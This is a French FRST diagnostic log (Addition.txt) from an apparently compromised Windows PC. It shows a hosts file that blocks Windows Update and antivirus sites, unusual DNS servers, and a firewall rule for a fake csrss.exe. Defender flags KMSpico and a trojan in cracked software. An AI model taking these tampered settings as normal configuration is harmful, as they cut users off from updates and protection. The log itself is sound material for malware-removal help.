2019-03-29 16:28 - 2019-03-29 16:47 - 000095232 _____ () C:\Program Files\WindowsApps\Facebook.Facebook_186.2191.46880.0_x86__8xx8rvfyw5nnt\WinMediaFoundation_osmeta.dll
2019-03-29 16:28 - 2019-03-29 16:41 - 000053760 _____ () C:\Program Files\WindowsApps\Facebook.Facebook_186.2191.46880.0_x86__8xx8rvfyw5nnt\EGL_osmeta.dll
2019-03-29 16:28 - 2019-03-29 16:41 - 000829952 _____ () C:\Program Files\WindowsApps\Facebook.Facebook_186.2191.46880.0_x86__8xx8rvfyw5nnt\GLESv2_osmeta.dll
2019-03-29 16:28 - 2019-03-29 16:41 - 262255104 _____ () C:\Program Files\WindowsApps\Facebook.Facebook_186.2191.46880.0_x86__8xx8rvfyw5nnt\App.dll
2019-03-29 16:28 - 2019-03-29 16:41 - 000453120 _____ () C:\Program Files\WindowsApps\Facebook.Facebook_186.2191.46880.0_x86__8xx8rvfyw5nnt\OpenAL_osmeta.dll
2019-03-29 16:28 - 2019-03-29 16:41 - 006719488 _____ () C:\Program Files\WindowsApps\Facebook.Facebook_186.2191.46880.0_x86__8xx8rvfyw5nnt\JavaScriptCore_osmeta.dll
2019-03-29 16:28 - 2019-03-29 16:46 - 004304384 _____ () C:\Program Files\WindowsApps\Facebook.Facebook_186.2191.46880.0_x86__8xx8rvfyw5nnt\WebKit_osmeta.dll
2019-03-29 16:28 - 2019-03-29 16:44 - 001305600 _____ () C:\Program Files\WindowsApps\Facebook.Facebook_186.2191.46880.0_x86__8xx8rvfyw5nnt\pgl_osmeta.dll
2019-03-29 16:28 - 2019-03-29 16:47 - 001553408 _____ () C:\Program Files\WindowsApps\Facebook.Facebook_186.2191.46880.0_x86__8xx8rvfyw5nnt\WebKitLegacy_osmeta.dll
2019-03-29 16:28 - 2019-03-29 16:46 - 021368832 _____ () C:\Program Files\WindowsApps\Facebook.Facebook_186.2191.46880.0_x86__8xx8rvfyw5nnt\WebCore_osmeta.dll

==================== Alternate Data Streams (Avec liste blanche) =========

(Si un élément est inclus dans le fichier fixlist.txt, seul le flux de données additionnel (ADS - Alternate Data Stream) sera supprimé.)


==================== Mode sans échec (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le "AlternateShell" sera restauré.)


==================== Association (Avec liste blanche) ===============

(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé.)


==================== Internet Explorer sites de confiance/sensibles ===============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre.)


==================== Hosts contenu: ==========================

(Si nécessaire, la commande Hosts: peut être incluse dans le fichier fixlist.txt afin de réinitialiser le fichier hosts.)

2018-04-11 23:38 - 2019-05-31 13:43 - 000007286 _____ C:\Windows\system32\drivers\etc\hosts

127.0.0.1 ds.download.windowsupdate.com
127.0.0.1 www.update.microsoft.com
127.0.0.1 download.windowsupdate.com
127.0.0.1 fe2.update.microsoft.com
127.0.0.1 whoer.net
127.0.0.1 www.whoer.net
127.0.0.1 windowsupdate.com
127.0.0.1 www.windowsupdate.com
127.0.0.1 microsoft.com
127.0.0.1 www.microsoft.com
127.0.0.1 www.windowsupdate.com
127.0.0.1 windowsupdate.com
127.0.0.1 www.microsoft.com
127.0.0.1 www.360totalsecurity.com
127.0.0.1 360totalsecurity.com
127.0.0.1 www.gratissoftwaresite.com
127.0.0.1 gratissoftwaresite.com
127.0.0.1 tweakers.net
127.0.0.1 www.tweakers.net
127.0.0.1 www.avg.com
127.0.0.1 avg.com
127.0.0.1 www.bestevirusscanner.net
127.0.0.1 bestevirusscanner.net
127.0.0.1 www.consumentenbond.nl
127.0.0.1 consumentenbond.nl
127.0.0.1 cheaplicensing.com
127.0.0.1 www.cheaplicensing.com
127.0.0.1 global.ahnlab.com
127.0.0.1 www.global.ahnlab.com
127.0.0.1 www.ahnlab.com

Il y a 222 plus de lignes.


==================== Autres zones ============================

(Actuellement, il n'y a pas de correction automatique pour cette section.)

HKU\S-1-5-21-874736629-648952403-2601760554-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\xerya\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppBackground\IMG_9335.jpg
DNS Servers: 82.163.142.9 - 95.211.158.137
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
Le Pare-feu est activé.

==================== MSCONFIG/TASK MANAGER éléments désactivés ==

Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.


==================== RèglesPare-feu (Avec liste blanche) ===============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

FirewallRules: [{85C2160C-4BC9-46F9-A6DE-A2E9D947F152}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{085B0D8E-7CFE-4E6E-AA82-357B86BFCEBE}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{D004AACE-B969-44EB-9C03-07D2B379E01E}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{5584870F-FB6A-4F1B-8216-7AA788C12BA3}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{991B7721-6BFE-4EDC-9561-0FD9D21B8326}] => (Allow) C:\Users\xerya\AppData\Local\Programs\Opera\58.0.3135.118\opera.exe (CryptCATAdminCalcHashFromFileHandle failed to return cbHash, #2 -> )
FirewallRules: [{9DFDA666-DB82-44BF-89CA-B1F3D64DA5E8}] => (Allow) C:\Users\xerya\AppData\Local\Programs\Opera\58.0.3135.127\opera.exe (CryptCATAdminCalcHashFromFileHandle failed to return cbHash, #2 -> )
FirewallRules: [{E391744B-2EDF-44DF-A192-DD068480645B}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{F37995E9-CBF2-49F0-9B63-73AE59F24EC6}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{182EA161-6993-47AB-821B-B25930F3EBA8}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{0E42C84F-62E7-4910-81A1-E399EC9C5049}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{5621B8CF-C95C-4020-8FFA-D673C4AAC7AD}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google Inc.)
FirewallRules: [{6B4BAB73-BCF1-4505-BC2E-7DFE42BAEA10}] => (Allow) C:\Program Files\Windows KMS Activator Ultimate 2018 4.0\Windows KMS Activator Ultimate 2018 4.0.exe ()
FirewallRules: [{A266E18F-AEBF-4BC7-920F-E7259C9A1E9A}] => (Allow) C:\Windows\rss\csrss.exe ()
FirewallRules: [{4A77E544-B936-468B-BFB9-1AF6407CAEAB}] => (Allow) C:\Users\xerya\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.)
FirewallRules: [{02A86DC8-1320-4155-859B-241A63CCF335}] => (Allow) C:\Users\xerya\AppData\Local\Chromium\Application\chrome.exe (The Chromium Authors)
FirewallRules: [{45CB7871-9750-4A10-9953-05860C547DA2}] => (Allow) C:\ProgramData\1976721434728161037\desktop_media_service.exe ()
FirewallRules: [{E96479E0-292F-4A76-942E-DF6AC8DAA249}] => (Allow) C:\Windows\SysWOW64\TCPSVCS.EXE (Microsoft Windows -> Microsoft Corporation)

==================== Points de restauration =========================

16-05-2019 12:54:25 Point de contrôle planifié
27-05-2019 19:07:43 Point de contrôle planifié

==================== Éléments en erreur du Gestionnaire de périphériques =============

Name: 
Description: 
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: Périphérique système de base
Description: Périphérique système de base
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Erreurs du Journal des événements: =========================

Erreurs Application:
==================
Error: (05/31/2019 03:26:04 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Échec de l’activation des licences (slui.exe) avec le code d’erreur suivant :
hr=0x80070424
Arguments de la ligne de commande :
RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=8b351c9c-f398-4515-9900-09df49427262;NotificationInterval=1440;Trigger=NetworkAvailable

Error: (05/31/2019 02:02:47 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Échec de l’activation des licences (slui.exe) avec le code d’erreur suivant :
hr=0x80070424
Arguments de la ligne de commande :
RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=8b351c9c-f398-4515-9900-09df49427262;NotificationInterval=1440;Trigger=UserLogon;SessionId=1

Error: (05/31/2019 01:51:23 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Le programme MicrosoftEdgeCP.exe version 11.0.17134.765 a cessé d'interagir avec Windows et a été fermé. Pour déterminer si des informations supplémentaires sont disponibles, consultez l'historique du problème dans le panneau de configuration Sécurité et maintenance.

ID de processus : 38ac

Heure de début : 01d517b73975c256

Heure de fin : 17

Chemin d'accès de l'application : C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

ID de rapport : d4719f11-ac92-461c-9d67-f5b2238abe37

Nom complet du package défaillant : Microsoft.MicrosoftEdge_42.17134.1.0_neutral__8wekyb3d8bbwe

ID de l'application relative au package défaillant : ContentProcess

Error: (05/31/2019 01:30:58 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante CAC1.tmp.exe, version : 0.0.0.0, horodatage : 0x5cef0a3d
Nom du module défaillant : KERNELBASE.dll, version : 10.0.17134.753, horodatage : 0x976ea24c
Code d’exception : 0xe06d7363
Décalage d’erreur : 0x00111942
ID du processus défaillant : 0x2818
Heure de début de l’application défaillante : 0x01d517b512a11a76
Chemin d’accès de l’application défaillante : C:\Users\xerya\AppData\Local\Temp\CAC1.tmp.exe
Chemin d’accès du module défaillant: C:\Windows\System32\KERNELBASE.dll
ID de rapport : a5d73cc8-063f-4e85-bad8-e6378998f595
Nom complet du package défaillant : 
ID de l’application relative au package défaillant :

Error: (05/31/2019 01:30:45 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Échec de l’activation des licences (slui.exe) avec le code d’erreur suivant :
hr=0x80070424
Arguments de la ligne de commande :
RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=8b351c9c-f398-4515-9900-09df49427262;NotificationInterval=1440;Trigger=NetworkAvailable

Error: (05/31/2019 01:30:41 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Échec de l’activation des licences (slui.exe) avec le code d’erreur suivant :
hr=0x80070424
Arguments de la ligne de commande :
RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=8b351c9c-f398-4515-9900-09df49427262;NotificationInterval=1440;Trigger=TimerEvent

Error: (05/31/2019 01:30:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante 1849.tmp.exe, version : 0.0.0.0, horodatage : 0x5cef0a3d
Nom du module défaillant : 1849.tmp.exe, version : 0.0.0.0, horodatage : 0x5cef0a3d
Code d’exception : 0xc0000409
Décalage d’erreur : 0x00012464
ID du processus défaillant : 0x367c
Heure de début de l’application défaillante : 0x01d517b4f769551d
Chemin d’accès de l’application défaillante : C:\Users\xerya\AppData\Local\Temp\1849.tmp.exe
Chemin d’accès du module défaillant: C:\Users\xerya\AppData\Local\Temp\1849.tmp.exe
ID de rapport : d5f5c5bb-2d4b-4127-bd08-7e55d5aee288
Nom complet du package défaillant : 
ID de l’application relative au package défaillant :

Error: (05/30/2019 07:13:02 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Échec de l’activation des licences (slui.exe) avec le code d’erreur suivant :
hr=0x80070424
Arguments de la ligne de commande :
RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=8b351c9c-f398-4515-9900-09df49427262;NotificationInterval=1440;Trigger=UserLogon;SessionId=1


Erreurs système:
=============
Error: (05/31/2019 03:32:10 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-CFD1U67)
Description: Le serveur {9E175B6D-F52A-11D8-B9A5-505054503030} ne s’est pas enregistré sur DCOM avant la fin du temps imparti.

Error: (05/31/2019 03:30:10 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-CFD1U67)
Description: Le serveur {7D096C5F-AC08-4F1F-BEB7-5C22C517CE39} ne s’est pas enregistré sur DCOM avant la fin du temps imparti.

Error: (05/31/2019 03:28:10 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-CFD1U67)
Description: Le serveur {7D096C5F-AC08-4F1F-BEB7-5C22C517CE39} ne s’est pas enregistré sur DCOM avant la fin du temps imparti.

Error: (05/31/2019 03:26:10 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-CFD1U67)
Description: Le serveur {7D096C5F-AC08-4F1F-BEB7-5C22C517CE39} ne s’est pas enregistré sur DCOM avant la fin du temps imparti.

Error: (05/31/2019 03:24:10 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-CFD1U67)
Description: Le serveur {7D096C5F-AC08-4F1F-BEB7-5C22C517CE39} ne s’est pas enregistré sur DCOM avant la fin du temps imparti.

Error: (05/31/2019 03:22:10 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-CFD1U67)
Description: Le serveur {9E175B6D-F52A-11D8-B9A5-505054503030} ne s’est pas enregistré sur DCOM avant la fin du temps imparti.

Error: (05/31/2019 03:20:35 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Le dépassement de délai (30000 millisecondes) a été atteint lors de l’attente de la connexion du service NativeDesktopMediaService.

Error: (05/31/2019 03:20:10 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-CFD1U67)
Description: Le serveur {9E175B6D-F52A-11D8-B9A5-505054503030} ne s’est pas enregistré sur DCOM avant la fin du temps imparti.


Windows Defender:
===================================
Date: 2019-05-28 15:20:59.968
Description: 
Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Pour plus d’informations, reportez-vous aux éléments suivants :
https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:Win32/AutoKMS.D&threatid=2147731321&enterprise=0
Nom : HackTool:Win32/AutoKMS.D
ID : 2147731321
Gravité : Élevée
Catégorie : Outil
Chemin : containerfile:_C:\Users\xerya\Downloads\KMSpico.zip; file:_C:\Users\xerya\Downloads\KMSpico.zip->Setup.exe; webfile:_C:\Users\xerya\Downloads\KMSpico.zip|https://uc61028e7796e8d7ca92cd5b9492.dl.dropboxusercontent.com/cd/0/get/AhxYGNovqO-8jVT8UR3pDyOyimQTHIh9XysRNEkPFKiwb77k19yHujjeanaiDyUjs-tpiDP5lz9LV-YMmfRRmXIq-sHs6yIiQ_O0WWJbxODDSw/file?dl=1#|pid:9480,ProcessStart:132035251895640936
Origine de la détection : Internet
Type de détection : Concret
Source de détection : Téléchargements et pièces jointes
Utilisateur : DESKTOP-CFD1U67\xerya
Nom du processus : Unknown
Version de la signature : AV: 1.293.2434.0, AS: 1.293.2434.0, NIS: 1.293.2434.0
Version du moteur : AM: 1.1.15900.4, NIS: 1.1.15900.4

Date: 2019-05-24 00:28:32.222
Description: 
L’analyse Antivirus Windows Defender a été arrêtée avant la fin.
ID de l’analyse : {76508C52-524C-4C3E-80FD-63545720AE8B}
Type de l’analyse : Logiciel anti-programme malveillant
Paramètres de l’analyse : Analyse rapide
Utilisateur : AUTORITE NT\Système

Date: 2019-05-14 22:56:11.119
Description: 
L’analyse Antivirus Windows Defender a été arrêtée avant la fin.
ID de l’analyse : {B7510F72-F0A1-4744-A7E4-BDEE631F5E15}
Type de l’analyse : Logiciel anti-programme malveillant
Paramètres de l’analyse : Analyse rapide
Utilisateur : AUTORITE NT\Système

Date: 2019-05-14 22:45:27.647
Description: 
L’analyse Antivirus Windows Defender a été arrêtée avant la fin.
ID de l’analyse : {23C71D2A-83A2-4D52-B622-48A2FD4278B8}
Type de l’analyse : Logiciel anti-programme malveillant
Paramètres de l’analyse : Analyse rapide
Utilisateur : AUTORITE NT\Système

Date: 2019-05-03 15:04:02.722
Description: 
Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Pour plus d’informations, reportez-vous aux éléments suivants :
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Skeeyah.A!rfn&threatid=2147694182&enterprise=0
Nom : Trojan:Win32/Skeeyah.A!rfn
ID : 2147694182
Gravité : Grave
Catégorie : Cheval de Troie
Chemin : file:_D:\LE SINGULIER\2016.exe; file:_D:\Ma musique\Ma musique.exe; file:_D:\Photoshop Cs6 Extended Version Finale Pc Fr\Adobe CS6.exe; file:_D:\Photoshop Cs6 Extended Version Finale Pc Fr\crack.exe; file:_D:\RECYCLER_DETEC\RECYCLER_DETEC.exe
Origine de la détection : Ordinateur local
Type de détection : Chemin rapide
Source de détection : Protection en temps réel
Utilisateur : DESKTOP-CFD1U67\xerya
Nom du processus : C:\Windows\explorer.exe
Version de la signature : AV: 1.293.624.0, AS: 1.293.624.0, NIS: 1.293.624.0
Version du moteur : AM: 1.1.15900.4, NIS: 1.1.15900.4

Date: 2019-05-28 15:44:41.288
Description: 
La fonctionnalité de protection en temps réel Antivirus Windows Defender a rencontré une erreur et échoué.
Fonctionnalité : Analyse du comportement
Code d’erreur : 0x80501002
Description de l’erreur : Le programme ne trouve pas les fichiers de définition qui permettent de détecter les logiciels non désirés. Recherchez des mises à jour de fichiers de définition, puis recommencez. Pour plus d’informations sur l’installation des mises à jour, voir Aide et support. 
Raison : La protection contre les logiciels malveillants a cessé de fonctionner pour une raison inconnue. Dans certains cas, le redémarrage du service peut résoudre le problème.

Date: 2019-05-28 15:44:41.287
Description: 
La fonctionnalité de protection en temps réel Antivirus Windows Defender a rencontré une erreur et échoué.
Fonctionnalité : Sur accès
Code d’erreur : 0x80501002
Description de l’erreur : Le programme ne trouve pas les fichiers de définition qui permettent de détecter les logiciels non désirés. Recherchez des mises à jour de fichiers de définition, puis recommencez. Pour plus d’informations sur l’installation des mises à jour, voir Aide et support. 
Raison : La protection contre les logiciels malveillants a cessé de fonctionner pour une raison inconnue. Dans certains cas, le redémarrage du service peut résoudre le problème.

Date: 2019-05-27 08:46:25.643
Description: 
Antivirus Windows Defender a rencontré une erreur lors d la mise à jour des signatures.
Nouvelle version de la signature : 
Version précédente de la signature : 1.293.2215.0
Source de mise à jour : Centre de protection Microsoft contre les logiciels malveillants
Type de signature : Anti-virus
Type de mise à jour : Complet
Utilisateur : AUTORITE NT\SERVICE RÉSEAU
Version actuelle du moteur : 
Version précédente du moteur : 1.1.15900.4
Code d’erreur : 0x80072ee7
Description de l’erreur : L’adresse ou le nom de serveur n’a pas pu être résolu 

Date: 2019-05-27 08:46:25.643
Description: 
Antivirus Windows Defender a rencontré une erreur lors d la mise à jour des signatures.
Nouvelle version de la signature : 
Version précédente de la signature : 1.293.2215.0
Source de mise à jour : Centre de protection Microsoft contre les logiciels malveillants
Type de signature : Logiciel anti-espion
Type de mise à jour : Complet
Utilisateur : AUTORITE NT\SERVICE RÉSEAU
Version actuelle du moteur : 
Version précédente du moteur : 1.1.15900.4
Code d’erreur : 0x80072ee7
Description de l’erreur : L’adresse ou le nom de serveur n’a pas pu être résolu 

Date: 2019-05-27 08:46:25.643
Description: 
Antivirus Windows Defender a rencontré une erreur lors d la mise à jour des signatures.
Nouvelle version de la signature : 
Version précédente de la signature : 1.293.2215.0
Source de mise à jour : Centre de protection Microsoft contre les logiciels malveillants
Type de signature : Anti-virus
Type de mise à jour : Complet
Utilisateur : AUTORITE NT\SERVICE RÉSEAU
Version actuelle du moteur : 
Version précédente du moteur : 1.1.15900.4
Code d’erreur : 0x80072ee7
Description de l’erreur : L’adresse ou le nom de serveur n’a pas pu être résolu 

==================== Infos Mémoire =========================== 

Processeur: Intel(R) Core(TM) i5-3320M CPU @ 2.60GHz
Pourcentage de mémoire utilisée: 55%
Mémoire physique - RAM - totale: 3975.55 MB
Mémoire physique - RAM - disponible: 1773.95 MB
Mémoire virtuelle totale: 4679.55 MB
Mémoire virtuelle disponible: 1895.5 MB

==================== Lecteurs ================================

Drive c: () (Fixed) (Total:465.22 GB) (Free:421.82 GB) NTFS

\\?\Volume{543968d4-0000-0000-0000-100000000000}\ (Réservé au système) (Fixed) (Total:0.54 GB) (Free:0.14 GB) NTFS

==================== MBR & Table des partitions ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: 543968D4)
Partition 1: (Active) - (Size=549 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=465.2 GB) - (Type=07 NTFS)

==================== Fin de Addition.txt ============================